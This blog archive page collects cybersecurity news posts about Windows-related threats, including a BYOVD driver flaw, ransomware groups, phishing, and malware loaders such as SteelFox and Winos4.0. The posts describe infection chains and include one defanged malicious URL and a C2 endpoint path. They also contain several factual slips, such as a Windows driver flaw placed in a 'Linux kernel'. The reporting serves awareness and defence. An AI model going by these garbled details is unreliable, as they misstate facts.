Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Windows. Show all posts
Windows
BYOVD Attack CyberCrime Cybersecurity CyberThreat Vulnerabilities and Exploits Vulnerability Windows

Cybercriminals Target Paragon Partition Manager Vulnerability in BYOVD Attacks

 


It has been reported that threat actors have been actively exploiting a security vulnerability within the BioNTdrv.sys driver of Paragon Partition Manager in ransomware attacks by elevating privileges and executing arbitrary code under the guise of attacks. The CERT Coordination Center (CERT/CC) has identified this zero-day vulnerability as CVE-2025-0289, one of five security flaws discovered by Microsoft during the past year. 

Other flaws have been identified, including arbitrary memory mapping, arbitrary memory write, null pointer dereferences, insecure kernel resource access, and arbitrary memory move vulnerabilities. It is especially concerning that an adversary may be able to exploit this vulnerability. It involves a Microsoft-signed driver, which allows adversaries to take advantage of the Bring Your Own Vulnerable Driver (BYOVD) technique. 

Using this method, attackers can compromise systems regardless of whether Paragon Partition Manager is installed, broadening the attack surface significantly. As BioNTdrv.sys operates at the kernel level, threat actors can exploit these vulnerabilities to execute commands with elevated privileges. This allows them to bypass security measures and defensive software, as attackers can access the system and deploy additional malicious payloads. 

Even though Microsoft researchers have identified all five security flaws, the company can not divulge what ransomware groups have been leveraging CVE-2025-0289 to execute their attacks. They are only aware that it has been weaponized in ransomware operations. A bulletin issued by Microsoft's CERT Coordination Center (CERT/CC) indicated that threat actors have been exploiting this vulnerability to conduct BYOVD-based ransomware attacks. 

According to the CVE-2025-0289 vulnerability, further malicious code within compromised environments can be executed by exploiting this vulnerability to escalate privileges to the SYSTEM level. This vulnerability can be exploited to facilitate the exploitation of BYOVD attacks, even on systems where the affected driver is not installed, and this can result in threat actors gaining elevated privileges and executing malicious code without the protection of security systems in place. 

As part of the identified security flaws affecting BioNTdrv.sys versions 1.3.0 and 1.5.1, CVE-2025-0285 is a flaw in version 7.9.1 which permits the mapping of kernel memory to arbitrary user inputs by not properly validating the length of the input. By exploiting this vulnerability, the user can escalate their privileges even further. 

There is a CVE-2025-0286 vulnerability that exists in version 7.9.1, resulting from improper validation of input controlled by users, which allows attackers to exploit this flaw to execute malicious code on the target machine. An unprivileged code execution vulnerability has been found in version 7.9.1, caused by an insufficient MasterLrp structure in the input buffer, which can result in a null pointer dereference vulnerability. 

Successful exploit allows arbitrary kernel-level code to be executed, facilitating privilege escalation and further misuse. Version 7.9.1 contains a vulnerability in the memmove function. This function fails to properly sanitize user-supplied data, allowing attackers to manipulate kernel memory and escalate privileges. 

Inversion of the CVE-2025-0289 vulnerability, an insecure kernel resource access vulnerability, has been found in version 17 of the Linux kernel due to a failure to validate the MappedSystemVa pointer before passing it to HalReturnToFirmware during the detection process. By exploiting this vulnerability, attackers can compromise the system. 

This security vulnerability has been addressed by Paragon Software by releasing the updated driver BioNTdrv.sys version 2.0.0 across all products within Paragon Software's Hard Disk Manager suite, including Partition Manager versions 17.45.0 and later versions. This update has been developed to reduce the risks associated with the previously identified security vulnerabilities. 

There is also a dedicated security patch available for 64-bit versions of Windows 10, Windows 11, and Windows Server 2016, 2019, 2022, and 2025 that will provide users with an additional layer of protection against any exploits that might occur in the future, thereby enhancing the level of security. As part of Microsoft's efforts to protect its ecosystem, it has updated its Vulnerable Driver Blocklist, which effectively disables the execution of BioNTdrv.sys versions that are compromised within Windows environments, thereby preventing exploitation. 

Users and enterprises are strongly encouraged to ensure that this protection mechanism is kept in place to prevent exploitation. In light of the ongoing threat posed by these vulnerabilities, especially as a result of ransomware attacks, all users of Paragon Partition Manager and its associated products must update their software as soon as possible to the newest version available. 

As a further precaution, all Windows users should make sure that they enable the Microsoft Vulnerable Driver Blocklist feature as soon as possible. This is because it serves as a critical defense against BYOVD (Bring Your Vulnerable Driver) attacks, where outdated or insecure drivers are leveraged to elicit privileges and compromise a computer system.
Read more »
Windows
Cyber Security LibreOffice Updates Windows

LibreOffice Fixes Security Flaw That Allowed Malicious File Execution

 



LibreOffice, a popular free office suite, recently fixed a major security flaw that could have let hackers run harmful files on Windows computers. The issue, identified as CVE-2025-0514, was related to how the software handled links inside documents. If exploited, it could allow attackers to trick users into opening dangerous files.  


How the flaw worked  

LibreOffice allows users to click on hyperlinks in documents to open websites or files. Normally, it blocks links that try to open unsafe files, but older versions (before 24.8.5) failed to properly check certain types of links.  

Hackers found a way to trick the software by using specially designed web addresses. When a user clicked one of these deceptive links, LibreOffice could mistakenly treat it as a local file path and execute harmful programs. Unlike other document-based attacks that require macros, this method only needed the user to click a link, making it especially dangerous.  


LibreOffice fixes the issue  

To prevent such attacks, LibreOffice released version 24.8.5 on February 25, 2025. The update improves how the software checks links, ensuring that unsafe web addresses cannot be mistaken for local files.  

Developers Caolán McNamara from Collabora Productivity and Stephen Bergman from allotropia worked on fixing the issue after it was reported by security researcher Amel Bouziane-Leblond. The flaw highlighted how small errors in how software reads links can create serious security risks.  


What users should do  

This vulnerability could be used in phishing scams where hackers send fake documents to trick people into clicking malicious links. To stay safe, users should update their LibreOffice software immediately.  

Here are some steps to stay protected:  

1. Install the latest LibreOffice update (24.8.5 or later) to fix the issue  

2. Be cautious with documents from unknown sources, especially if they contain links  

3. Avoid clicking hyperlinks in documents unless you trust the sender  

4. Businesses should ensure all their computers are updated to reduce security risks  


The importance of updates 

While this flaw mainly affected Windows users, it highlights the need for strong security measures in office software. Cybercriminals constantly find new ways to exploit common tools, making software updates and user awareness essential.  

So far, there are no known real-world attacks using this vulnerability, but security experts consider it critical. Users can download the latest LibreOffice version from the official website or update it through Linux package managers.

Read more »
Windows
data security LightSpy Linux Mac malware Windows

LightSpy Malware Attacks Users, Launches Over 100 Commands to Steal Data


Cybersecurity researchers at Hunt.io have found an updated version of LightSpy implant, a modular surveillance framework for data collection and extraction. Famous for attacking mobile devices initially, further enquiry revealed it can attack macOS, Windows, Linux, and routers. 

LightSpy has been executed in targeted attacks, it uses watering hole techniques and exploit-based delivery, coupled with an infrastructure that swiftly escapes detection. LightSpy was first reported in 2020, targeting users in Hong Kong.

History of LightSpy

LightSpy has been historically famous for attacking messaging apps like WeChat, Telegram, QQ, Line, and WhatsApp throughout different OS. According to ThreatFabric report, the framework can extract payment data from WeChat, remove contacts, wipe out messaging history, and alot of other things.

The compromised things include WiFi network details, iCloud Keychain, screenshots, location, browser history, photos, call history, and SMS texts.

Regarding server analysis, the LightSpy researcher said they "share similarities with prior malicious infrastructure but introduce notable differences in the command list."

Further, "the servers analyzed in this research As previously observed, the cmd_list endpoint is at /ujmfanncy76211/front_api. Another endpoint, command_list, also exists but requires authentication, preventing direct analysis."

LightSpy Capabilities

In 2024, ThreatFabric reported about an updated malware version that has destructive capability to stop compromised device from booting up, in addition to the number of supported plugins from 12 to 28.

Earlier research has disclosed potential overlaps between an Android malware called "DragonEgg" and LightSpy, showing the threat's cross-platform nature.

Hunt.io's recent analysis study of the malicious command-and-control (C2) infrastructure linked with the spyware has found support for more than 100 commands spread across iOS, macOS, Linux, routers, and Windows.

Expert insights

Commenting on the overall impact of the malware, Hunt.io experts believe “LightSpy's infrastructure reveals previously unreported components and administrative functionality.” However, the experts remain unsure if it symbolizes new growths or earlier versions not publicly reported. “Command set modifications and Windows-targeted plugins suggest that operators continue to refine their data collection and surveillance approach across multiple platforms,” concludes 

To stay safe, experts suggest users to:

Limit app permissions to avoid unwanted access to important data. “On Android, use Privacy Dashboard to review and revoke permissions; on iOS, enable App Privacy Reports to monitor background data access.”

Turn on advanced device security features that restrict the exploitability of devices. iOS users can enable Lockdown Mode and Android users can turn on Enhanced Google Play Protect and use protection features to identify and block suspicious activities. 

Read more »
Windows
BlackLock Cyber Attacks Linux Ransomware Windows

BlackLock Ransomware: The Fastest-Growing Cyber Threat and How to Stay Safe

 



Ransomware remains a major problem for businesses, and a new cybercriminal group is expanding at an alarming rate. Security researchers at ReliaQuest have identified BlackLock as the fastest-growing ransomware operation today, with its activity increasing by 1,425% since late 2024. Although it is currently the seventh most active ransomware group, experts predict it could become the biggest threat in 2025.  

Despite law enforcement cracking down on major ransomware gangs like LockBit in 2024, the number of cyberattacks continues to grow. A report from January 31 suggested ransomware incidents had risen by 15% compared to the previous year. However, a February 20 study by Symantec showed a slower increase of just 3%. No matter the rate, the takeaway is the same, ransomware remains a serious risk.  


How BlackLock Ransomware Operates  

BlackLock ransomware is designed to infect Windows, Linux, and VMware ESXi systems, making it a versatile and dangerous threat. Cybercriminals behind this operation have developed unique methods to pressure victims into paying ransom quickly.  


1. Blocking access to stolen data  

  • Ransomware groups often leak stolen information on dark web sites to force victims to pay.  
  • BlackLock makes it harder for victims and cybersecurity teams to access leaked data by blocking repeated download attempts.  
  • If someone tries to retrieve files too often, they either receive no response or only see empty files with contact details instead of real data.  
  • This tactic prevents companies from fully understanding what was stolen, increasing the likelihood of paying the ransom.  


2. Recruiting criminals to assist with attacks  

  • BlackLock actively hires "traffers," cybercriminals who help spread ransomware by tricking people into downloading malware.  
  • These traffers guide victims toward fake websites or malicious links that install ransomware.  
  • The group openly recruits low-level hackers on underground forums, while more skilled cybercriminals are privately contacted for higher-level roles.  


Steps to Protect Your Systems  

Security experts recommend taking immediate action to strengthen defenses, especially for companies using VMware ESXi servers. Here are some key steps:  

1. Turn off unnecessary services  

  • Disable unused features like vMotion and SNMP to reduce possible entry points for attackers.  

2. Strengthen security restrictions  

  •  Configure VMware ESXi hosts to only allow management through vCenter, making it harder for hackers to exploit weaknesses.  

3. Limit network access  

  •  Use firewalls and strict access controls to prevent unauthorized users from reaching sensitive systems.  

Additional recommendations include:  

1. Activating multi-factor authentication (MFA) to prevent unauthorized logins.  

2. Disabling Remote Desktop Protocol (RDP) on systems that do not need remote access.  

The rapid rise of BlackLock ransomware shows that cybercriminals ar constantly developing new strategies to pressure victims and avoid detection. Organizations must take proactive steps to secure their networks and stay informed about emerging threats. Implementing strong security controls today can prevent costly cyberattacks in the future.

Read more »
Windows
ADFS Microsoft Password Phishing Attacks Technology Windows

Hackers Steal Login Details via Fake Microsoft ADFS login pages

Microsoft ADFS login pages

A help desk phishing campaign attacked a company's Microsoft Active Directory Federation Services (ADFS) via fake login pages and stole credentials by escaping multi-factor authentication (MFA) safety.

The campaign attacked healthcare, government, and education organizations, targeting around 150 victims, according to Abnormal Security. The attacks aim to get access to corporate mail accounts for sending emails to more victims inside a company or launch money motivated campaigns such as business e-mail compromise (BEC), where the money is directly sent to the attackers’ accounts. 

Fake Microsoft ADFS login pages 

ADFS from Microsoft is a verification mechanism that enables users to log in once and access multiple apps/services, saving the troubles of entering credentials repeatedly. 

ADFS is generally used by large businesses, as it offers single sign-on (SSO) for internal and cloud-based apps. 

The threat actors send emails to victims spoofing their company's IT team, asking them to sign in to update their security configurations or accept latest policies. 

How victims are trapped

When victims click on the embedded button, it takes them to a phishing site that looks same as their company's authentic ADFS sign-in page. After this, the fake page asks the victim to put their username, password, and other MFA code and baits then into allowing the push notifications.

The phishing page asks the victim to enter their username, password, and the MFA code or tricks them into approving the push notification.

What do the experts say

The security report by Abnormal suggests, "The phishing templates also include forms designed to capture the specific second factor required to authenticate the targets account, based on the organization's configured MFA settings.” Additionally, "Abnormal observed templates targeting multiple commonly used MFA mechanisms, including Microsoft Authenticator, Duo Security, and SMS verification."

After the victim gives all the info, they are sent to the real sign-in page to avoid suspicious and make it look like an authentic process. 

However, the threat actors immediately jump to loot the stolen info to sign into the victim's account, steal important data, make new email filter rules, and try lateral phishing. 

According to Abnormal, the threat actors used Private Internet Access VPN to hide their location and allocate an IP address with greater proximity to the organization.  

Read more »
Windows
Cyber Attacks Mac OS North Korea Remote Work threat mitigation Windows

Hackers Disguise as IT Employees: FBI Warns to Disable Local Admin Accounts

Hackers Disguise as IT Employees: FBI Warns to Disable Local Admin Accounts

Hackers use various ways to steal user data, one recent trend, according to the FBI, shows they have started gaining employment with companies. The agency has pushed out public announcement I-012325-PSA, warning organizations in the U.S. to disable local admin accounts, business must pay attention to it.

North Korean Hackers Disguising as IT Workers

The FBI has warned the public, private sector, and the world about the “victimization of US-based businesses”, as cyberattacks involving remote IT workers from North Korea are on the rise. It has noticed North Korean IT workers gaining illegal access to systems to steal confidential data and launch other cyber-crime operations. 

In an FBI announcement reported by Forbes, it was disclosed that “victims have seen proprietary data and code held to ransom,” and “the copying of corporate code repositories to attacker user profiles and personal cloud accounts.” Additionally,  the attackers have also “attempted harvesting of company credentials and session cookies for further compromise opportunities.” 

Understanding the “Principle of Least Privilege”

Law enforcement and intelligence agencies like the FBI and NSA (National Security Agency) have advised the principle of least privilege,  to “only allow designated administrator accounts to be used for administrative purposes.” The aim is to limit the administrative rights available to Mac and Windows users to ensure security. 

The principle of least privilege gives admin account access to only selected people, and nobody else. The method ensures company employees only have access to particular resources needed to get the job done, not admin rights. For instance, the user account completes day-to-day needs, whereas for something critical, like software installation, the systems will ask for admin credentials. 

Wikipedia is one great example of using this technique, it has user accounts for making backups that don’t need to install software and only have rights for running backups and related applications. 

Mitigating Threats- Advice from FBI and Security Experts

The FBI suggests businesses disable local administrator accounts and restrict privileges for installing remote desktop apps, keeping an eye out for any unusual network traffic. It has warned organizations to remember that “North Korean IT workers often have multiple logins into one account in a short period of time,” coming from various IP addresses linked with different countries. 

The agency has also advised HRs, development teams, and hiring managers to focus “on changes in address or payment platforms during the onboarding process.”

Read more »
Windows
Amaday Bot Lumma Stealer malware Malware Campaign Manufacturing Windows

New Malware Campaign Attacks Manufacturing Industry


Lumma Stealer and Amaday Bot Resurface

In a recent multi-stage cyberattack, Cyble Research and Intelligence (CRIL) found an attack campaign hitting the manufacturing industry. The campaign depends upon process injection techniques aimed at delivering malicious payloads like Amaday Bot and Lumma Stealer.

Using a chain of evasive actions, the threat actor (TA) exploits diverse Windows tools and processes to escape standard security checks, which leads to persistent system control and potential data theft. 

About the campaign

CRIL found an advanced multi-level attack campaign that starts with a spear-phishing mail. The email has a link that directs to an LNK file, hidden as a PDF file. When the fake PDF is clicked, it launches a series of commands. The LNK file is hosted on a WebDAV server, making it challenging for security software to trace.

“For instance, one of the malicious links observed in the campaign was hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop. The attack’s effectiveness stems from its ability to exploit the name of a legitimate cloud-based document management system (LogicalDOC), commonly used in manufacturing and engineering industries, to convince targets into opening the file,” reports the Cyber Express.

How the campaign works

After executing the LNK file, it opens ssh.exe, a genuine system utility that can escape security software checks. Via ssh.exe, a PowerShell command is activated to retrieve an extra payload via a remote server from mshta.exe. 

Threat actors use this process to avoid detection via Google’s Accelerated Mobile Pages (AMP) framework merged with a compressed URL. The retrieved payload is a malicious script containing extra hacked commands that gradually deliver the last malicious payload to the target system.

Once the LNK file is executed, it launches ssh.exe, a legitimate system utility that can bypass security software’s detection. Through ssh.exe, a PowerShell command is triggered, which fetches an additional payload from a remote server using mshta.exe. This process is designed to evade detection by using Google’s Accelerated Mobile Pages (AMP) framework combined with a shortened URL. 

The payload fetched is a script that contains additional obfuscated commands that eventually deliver the final malicious payload to the victim’s system. 

CYBLE blog says, “The final payload, which involves the deployment of both Lumma stealer and Amadey bot, highlights the TA’s intent to steal sensitive information and maintain persistent control over compromised systems. Yara and Sigma rules to detect this campaign, are available for download from the linked GitHub repository.”    

Read more »
Windows
Cyber Attacks Fake Website Firefox RomCom Windows

Russian Hackers Use Firefox and Windows Vulnerabilities in Global Cyberattack

 



A sophisticated cyberattack carried out by the Russian cyber threat group RomCom APT has raised alarms within the global cybersecurity community. Exploiting two previously unknown zero-day vulnerabilities in Firefox and Windows, the attack, which took place in October, was able to infiltrate systems without any user interaction. This tactic marks a concerning escalation in cyberattack methods, highlighting the ever-growing sophistication of threat actors. 
 

How the Attack Unfolded 

 
RomCom APT used two critical vulnerabilities to carry out its campaign: 
 
1. Firefox Animation Timeline Vulnerability (CVE-2024-9680) 
 
A severe flaw in Firefox's animation timelines allowed the attackers to remotely execute malicious code. Rated 9.8 out of 10 on the Common Vulnerability Scoring System (CVSS), the vulnerability was exploited through fake websites. Victims who visited these websites unknowingly downloaded malware disguised as the RomCom backdoor. Once installed, the malware silently redirected users to the legitimate websites they intended to visit, leaving them unaware of the compromise. This vulnerability also affected Tor, which shares a code base with Firefox, broadening its potential impact. 

2. Windows Task Scheduler Vulnerability (CVE-2024-49039) 
 
The second vulnerability resided in the Windows Task Scheduler, with a CVSS score of 8.8. This flaw allowed the attackers to bypass the security sandbox of the browser, escalating privileges and providing them with full access to the victim's system. With this level of control, RomCom hackers were able to execute further malicious activities undetected. 

 
Targets and Techniques 

 
RomCom APT deployed fake websites posing as well-known platforms, including ConnectWise, Devolutions, and Correctiv, to lure victims. The group targeted high-value sectors such as **insurance**, pharmaceuticals, defense, energy, and government institutions, with the majority of victims located in North America and Europe, particularly in Germany, France, and the United States. 
 
RomCom is notorious for combining cybercrime with politically motivated espionage. This attack is part of a broader pattern targeting politically and economically sensitive sectors. Prompt responses from cybersecurity teams, including collaboration with security experts, helped prevent the attack from spreading widely, limiting its impact. 
 

Swift Vulnerability Patching 
 

Fortunately, both vulnerabilities were addressed promptly. Mozilla released a patch for the Firefox flaw on October 9, just 25 hours after it was notified. Similarly, Microsoft issued a patch for the Windows vulnerability on November 12. These swift responses underscore the importance of keeping systems updated, as timely patches are often the first line of defense against zero-day vulnerabilities. 

 
Cybersecurity Takeaways 

 
This attack serves as a stark reminder of the necessity for robust software maintenance and a proactive patch management strategy. Zero-day vulnerabilities are often exploited rapidly, making regular updates crucial for minimizing the risk of exploitation. While the RomCom attack was relatively short-lived, it underscores the evolving nature of cyber threats. Organizations and individuals alike must stay vigilant, prioritize timely software updates, and adopt comprehensive cybersecurity measures to protect against increasingly sophisticated attacks.   
 

Key Points for Cybersecurity Practitioners: 

  • Maintain Updated Software: Regular updates and patches are essential to protecting against zero-day vulnerabilities. 
  • Awareness of Emerging Threats: Understand and mitigate the risks associated with zero-click attacks and other advanced persistent threats. 
  • Strengthen Incident Response: Timely detection and rapid response are critical to minimizing the impact of cyberattacks.
Read more »
Windows
Check Point research CyberCrime Cyberhackers Cybersecurity Cyberthreats GodLoader Godot Game iOS Linux macOS malware Windows

Godot Game Engine Targeted in Widespread Malware Attack

 


A newly identified malware threat, GodLoader, is targeting gamers globally by exploiting the Godot game development engine, according to a report from Check Point Research. This sophisticated attack has already impacted more than 1.2 million users across various platforms. 

How GodLoader Works 

 
GodLoader infiltrates devices by leveraging Godot’s .pck files, which package game assets. These files can embed harmful scripts that execute malicious code upon launching a game, effectively bypassing traditional antivirus detection. The malware primarily targets: 

-Windows 
- macOS 
- Linux 
- Android 
- iOS 

Check Point Research reported that hackers have infected over 17,000 systems in just the past three months. By utilizing Godot’s GDScript (a Python-like scripting language), attackers distribute malware via more than 200 GitHub repositories, often masked as legitimate game assets. 

Exploitation of Open-Source Trust 


Eli Smadja, Security Research Group Manager at Check Point Software Technologies, highlighted the exploitation of open-source platforms:  

"Cybercriminals have turned the flexibility of the Godot Engine into a vulnerability, spreading cross-platform malware like GodLoader by capitalizing on the trust users place in open-source software." 

Infected computers are not only compromised but may also be converted into cryptocurrency mining rigs through XMRig, rendering them unusable for other tasks. 

Stargazers Ghost Network: Distribution-as-a-Service (DaaS) 


The attackers used the Stargazers Ghost Network to distribute GodLoader. This platform, active since 2022, employs over 3,000 ghost GitHub accounts to create networks of malicious repositories. These repositories: 

- Host info stealers like RedLine, Lumma Stealer, Rhadamanthys, and RisePro. 
- Manipulate GitHub’s trending section by starring, forking, and subscribing to their own repositories to appear legitimate. 

During a campaign between September and October 2024, Check Point discovered four separate attacks targeting developers and gamers. These attacks aimed to distribute infected tools and games, enticing users to download malware through seemingly credible GitHub repositories. 

Broader Implications and Future Risks 


The malware’s ability to target multiple platforms significantly enlarges the attack surface, posing a growing threat to the gaming community. Experts warn that attackers could embed malware into cheats, mods, or cracks for popular Godot-built games, increasing the vulnerability of millions of gamers. 

The Stargazers Ghost Network has already earned over $100,000 by distributing malware through its DaaS platform. With its continuous evolution, this network poses an ongoing threat to both developers and users of the Godot engine. 

Call to Action for Developers and Gamers 


Industry experts emphasize the urgent need for proactive cybersecurity measures to counter such threats. Recommendations include: 

- Avoid downloading game assets from unverified sources. 
- Regularly update antivirus and anti-malware software. 
- Implement robust security practices when developing or downloading games built with Godot. 

As the gaming ecosystem continues to expand, vigilance and collaboration between developers and security researchers will be critical in mitigating threats like GodLoader and ensuring a safer gaming environment.
Read more »
Winos4.0
China Hackers malware Windows Winos4.0

Growing Use of Winos4.0 Toolkit Poses New Threat to Windows Users

 



Advanced hacking toolkit Winos4.0 spreads across the globe, security experts warn. Originally reported by Trend Micro, this new toolkit-just like known kits Cobalt Strike and Sliver-was connected to a string of recent cyber attacks in China, having initially spread through fake software downloads. This year, Fortinet reported that the toolkit is also disseminated through game-themed files, which now tends to expand and might pose a risk to a larger user base.


Attack Framework

Winso4.0 is a post-exploitation toolkit: after successfully gaining initial access to a system, the attackers use it for further invasion and domination. First, it was discovered inside the applications downloaded by users who considered it software in their interest, including VPNs or Google Chrome downloads for the Chinese market. Under the aliases Void Arachne or Silver Fox, the attackers entice users with these very popular applications full of malicious components designed to compromise their systems.

New strategies involve attackers using game applications, via which they have broadcasted Winos4.0, again targeting Chinese users mainly. This way, hackers change and utilise attractive downloads to penetrate devices.


Infection Stages

When one of such benign-looking files is downloaded by a victim, the Winos4.0 toolkit initiates a four-phase infection:

1. Stage 1: After installation, a DLL file you.dll, was retrieved from a remote domain. This file installed persistence on the device by setting values in the Windows Registry such that the malware would persist after the system restarts:.

2. Stage 2: At this step, the injected shellcode is loaded to download necessary APIs and communicate with a C2 server, which enables hackers to send commands and retrieve files from the infected device.

3. Stage 3: It fetches more encoded data from the C2 server in a second DLL file named上线模块.dll which saves to the Windows Registry to be used later, apart from updating server addresses to maintain an active link between the malware and its operators.

4. Final Stage: The last stage (login module.dll) will activate all main functions of the toolkit, including detailed system data gathering (like IP address and type of OS), detection of security tools, searching for crypto-wallets, and keeping a hidden backdoor. Through this backdoor connection, hackers can exfiltrate data, execute commands, and sustain their activity monitoring.

 

Evasion Techniques

Winos4.0 already has an inbuilt scanner for the detection of security products, including commercial products by Kaspersky, Avast, Bitdefender, and Malwarebytes. It will then change its behaviour to avoid detection or even quit if the toolkit finds itself running in an environment that is under surveillance. This versatility makes the tool very dangerous when it gets into cybercriminals' hands.

 

Emerging Menace

The fact that the toolkit Winos4.0 is still being used and fine-tuned points towards the growing importance of this toolkit in cyberattack strategies. As explained by Fortinet, it is a versatile and powerful framework "designed for remote control of compromised systems." Ongoing activity like this indicates that Winos4.0 is becoming a tool hackers like to use to gain control over Windows machines.


Preventive Actions

Always ready for downloading is a constant warning from the security experts to users, especially when it comes to free softwares or games which seem popular.

Avoid downloading applications and other forms of files from unknown sources. Even verifying if the software or file is coming from a legitimate source may also save it from infection. Moreover, one's security software must be updated frequently.

Knowing the threats of Winos4.0 would prevent many users from this malicious software by making them aware of this sophisticated malware.


Read more »
Windows PC
Cyber Vulnerabilities CyberCrime Cybersecurity IP Address Kaspersky malware STeelFox Windows Windows PC

Windows PCs at Risk as SteelFox Malware Targets Driver Vulnerabilities

 


Several experts have warned that hackers are using malware to attack Windows systems with the intention of mining cryptocurrency and stealing sensitive information from their devices. The latest Kaspersky Security Report claims to have spotted tens of thousands of infected endpoints. Cybercriminals have obtained fake cracks and activators for several commercial software products, such as Foxit PDF Editor, JetBrains, or AutoCAD, which they are selling to users. 

There is a vulnerability in a driver called WinRing0.sys that is associated with some fake cracks. The victim of this attack has reintroduced the CVE-2020-14979 and the CVE-2021-41285 vulnerabilities back onto the system by adding this driver at the same time, two three-year-old vulnerabilities that extended the privileges of the attacker to the maximum possible. 

SteelFox is a malware package that has been designed to mine cryptocurrency and steal credit card details via SYSTEM privileges by taking advantage of the "bring your own vulnerable driver" attack method. In forums and torrent trackers, malware bundle droppers appear as crack tools. These tools act as crack tools that activate legitimate versions of various software, such as Foxit PDF Editor, JetBrains, and AutoCAD. 

To evade detection and evade detection, state-sponsored threat actors and ransomware groups are known to exploit vulnerable drivers to escalate privileges. As of late, however, this method seems to be extended to attack against information-stealing malware as well. According to Kaspersky researchers, the SteelFox campaign was discovered in August of this year, but they add that the malware has been active since February 2023 and has been distributed through various channels (such as torrents, blogs and forum posts) in the past few weeks. 

The Rhadamanthys data theft malware has been available for download for some time, but since July 2024 the virus' version has been updated with copyright-related themes in an ongoing phishing campaign. There is a large-scale cybercrime campaign being tracked by the checkpoint group under the name CopyRightAdamantys. In addition to targeting the U.S., Europe, East Asia, and South America, the organization targets other regions as well. 

The campaign tries to impersonate dozens of companies, while each email is sent from a different Gmail account, providing a tailored impersonation of the target company as well as a tailored language based on the targeted entity, according to a technical analysis provided by the company. In the case of impersonated companies, there is almost 70% of them from the entertainment/media/technology/software sector." 

There is an element that stands out about the attacks: the deployment of the Rhadamanthys stealer version 0.7, which, as described by Insikt Group, Recorded Future's security division, early last month, is utilized to carry out optical character recognition. Cisco Talos, an Israeli company that specializes in cyber security, disclosed last week that it had been targeting users of Facebook business and advertising accounts in Taiwan by delivering malware known as Lumma or Rhadamanthys, which is designed to steal information.

There are three components inside the RAR archive. A legitimate executable vulnerable to DLL side-loading, a malicious DLL containing the stealer payload, and a decoy document containing the stealer payload. After the binary has been executed, it will sideload the DLL file that will create the environment that will allow Rhadamanthys to be deployed. It is likely that the threat actors were using artificial intelligence tools to spread the malware, based on both the scale of the campaign and the variety of lures that were included in the campaign and the emails sent by the sender, which Check Point attributed to a possible cybercrime group. 

It seems likely that this campaign was orchestrated by a financially motivated cybercrime group and not a nation-state actor, particularly given the large number of organizations across multiple regions targeted in this campaign," he continued. In addition to its global reach, the use of automated phishing tactics, and the use of a variety of lures, this campaign demonstrates how attackers continue to enhance their success rates." 

As part of these findings, Kaspersky also revealed a full-featured crimeware bundle dubbed SteelFox, which has been spreading via forums posts, torrent trackers, and blogs, passing itself off as legitimate utilities like Foxit PDF Editor, JetBrains, and AutoCAD in order to steal personal information. In the last two years, the campaign of terrorism has claimed victims in nearly 50 countries. The majority of the victims were in Brazil, China, Russia, Mexico, the United Arab Emirates, Egypt, Algeria, Vietnam, India, and Sri Lanka, with many more in Brazil, China, Russia, and Mexico. 

At this point in time, there is no known threat actor or group associated with this attack. A security researcher, Kirill Korchemny, said: "Delivered via sophisticated execution chains, notably shellcode, this type of malware abuses both Windows services and drivers in an attempt to accomplish its objectives." As a result of it, he said that he used stealer malware to obtain details about the victim's device as well as his credit card information. 

A dropper program is the starting point of this setup, in the sense that it mimics cracked versions of popular software, so when it is run, the dropper application will request administrator permissions and drop a next-stage loader which, in turn, will establish persistence and launch the SteelFox module. It is Kaspersky's opinion that although SteelFox's C2 domain is hardcoded, it has managed to conceal its presence through the use of multiple IP addresses and using DNS over HTTPS to resolve its IP addresses in order to hide its presence. Although SteelFox attacks don't have specific targets, they seem to focus on users of AutoCAD, JetBrains, and Foxit's Adobe PDF Editor app. 

In accordance with Kaspersky's visibility information, Kaspersky indicates that the malware is compromising systems in Brazil, China, Russia, Mexico, the UAE, Egypt, Algeria, Vietnam, India, and Sri Lanka among others. Researchers have identified a new and potent cyber threat: the SteelFox malware, a sophisticated crimeware bundle targeting Windows PCs through vulnerable drivers. This malware, still relatively new to the landscape, demonstrates advanced functionality and appears to be the product of a skilled C++ developer who has integrated multiple external libraries to enhance its capabilities. 

In a related development, analysts from FortiGuard Labs have reported the discovery of another malicious software framework named Winos4.0. This advanced framework, embedded in game-related applications, is engineered specifically to target Windows users. Originating as an evolved version of the Gh0strat malware, Winos4.0 enables attackers to remotely execute various actions, providing them with substantial control over compromised systems. The infection process for Winos4.0 is particularly deceptive. 

It spreads through game-related applications, such as installation utilities and performance enhancement tools, designed to appeal to gamers and other Windows users. Once an individual downloads and installs one of these compromised applications, a seemingly harmless BMP file is retrieved from a remote server. This file subsequently extracts and activates the Winos4.0 DLL file, initiating the malware’s operations. 

In its initial phase, Winos4.0 sets up an environment for deploying further modules and establishes persistence on the infected machine by modifying system registry keys or creating scheduled tasks. Through this multi-stage infection process, Winos4.0 builds a durable foothold on affected devices, opening avenues for continuous exploitation and control.
Read more »
Windows
Cyber Security JPCERT Logs Ransomware Windows

JPCERT Explains How to Identify Ransomware Attacks from Windows Event Logs

 




Japan Computer Emergency Response Team (JPCERT/CC) has published guidance on early identification of ransomware attacks in the system using Windows Event Logs. Probably by reviewing these logs, firms would identify some signs or clues of an existing ransomware attack and find themselves in a position to forestall this threat from spreading across the network.

JPCERT/CC stresses that the discovery of ransomware as early in the attack as possible is extremely important. Many ransomware variants leave apparent traces in Windows Event Logs, and that particular knowledge might be useful for cybersecurity teams to discover and finally stop attacks before they spread further. It's a strategy especially valuable in identifying the type of attack and tracing how ransomware might have entered the system.


Types of Event Logs to Monitor

The agency recommends checking four main types of Windows Event Logs, namely: Application, Security, System, and Setup logs. These types can carry some very important clues left by ransomware along with how it came into the environment and what systems are under attack.


Identifiable Ransomware Signatures in Event Logs

This JPCERT/CC report includes several specific log entries associated with certain ransomware families, which indicate that this was an active attack.

  • Conti Ransomware: This malware typically generates a broad set of logs associated with the Windows Restart Manager, observable through their event IDs 10000 and 10001. The variants such as Akira, Lockbit3.0, HelloKitty, and Bablock all generate almost identical logs because they share code from Lockbit and Conti.

Others, such as 8base and Elbie, also create similar patterns along with traces related to this malware.

  • Midas: This malware changes network configurations to spread across machines. It creates logs having an event ID of 7040.

  • BadRabbit- BadRabbit mostly creates logs with an event ID of 7045 when it instals the encryption modules, further suggesting an attack in progress.

  • Bisamware  Generates entries at both ends of Windows Installer transactions. The event IDs are 1040 and 1042.

